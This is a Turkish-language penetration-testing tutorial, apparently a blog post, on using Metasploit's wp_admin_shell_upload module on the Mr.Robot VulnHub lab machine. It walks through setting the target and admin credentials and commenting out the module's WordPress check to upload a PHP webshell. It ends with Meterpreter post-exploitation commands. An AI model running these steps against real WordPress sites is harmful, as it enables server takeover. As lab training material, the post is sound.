MSF wp_admin_shell_upload İstismar Modülü ile WordPress Yönetim Arayüzünden İşletim Sistemine Erişim Sağlanması

Web uygulaması sızma testleri sırasında erişilen web uygulaması üzerinden işletim sisteminde kod çalıştırılabilir. Bu yazıda yönetici hakları ile erişim sağlanan WordPress yönetim arayüzü MSF wp_admin_shell_upload istismar modülü ile hazırlanan bir PHP kodunun (webshell backdoor) hedefe otomatik olarak yüklenmesi yolu ile istismar edilecek ve işletim sistemine Meterpreter ile erişim sağlanacaktır.

Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/mr-robot-1,151/

Mr.Robot zafiyetli sanal makineye ait WordPress yönetim arayüzünde açılan oturum aşağıdaki gibidir.

 

WordPress yönetim arayüzü üzerinde yönetici yetkilerine sahipken hedef sisteme PHP kodu yüklemeyebilmek için MSF wp_admin_shell_upload istismar modülü kullanılabilir.

search wp_admin_shell_upload

 

Bulunan MSF modülü seçilir ve seçenekleri incelenir.

use exploit/unix/webapp/wp_admin_shell_upload
show options

 

Seçenekleri ayarlanır.

set RHOST 192.168.2.58
set USERNAME elliot
set PASSWORD ER28-0652

 

Modül başlatılır.

run

 

Ancak WordPress kurulu olmadığına dair bir hata mesajı alınmaktadır.

The target does not appear to be using WordPress

 

Hatanın ayrıntısı incelendiğinde – değişken adlarına göre – WordPress’in kurulu olmadığından değil, çevrim içi olarak çalışmadığı için hata alındığı görülmektedir.

locate wp_admin_shell_upload
grep -n “The target does not appear to be using WordPress” /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

 

Bu kontrol yorum satırı olarak değiştirildiğinde sonraki komutların çalışması beklenmektedir.

 

Modüller yeniden yüklendiğinde ve ilgili modül çalıştırıldığında Meterpreter bağlantısının elde edildiği görülür.

reload
run

 

Elde edilen erişimin (3056 ID’li proses) WordPress uygulaması üzerinden sağlandığı görülebilir.

getuid
getpid
shell
ps -ef | grep 3056

 

Kaynak:

 

 

 

Yazarın Bilgileri

Abdurrahim ÖZEL
Abdurrahim ÖZEL

Bir yorum

Yorum yapabilirsiniz

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.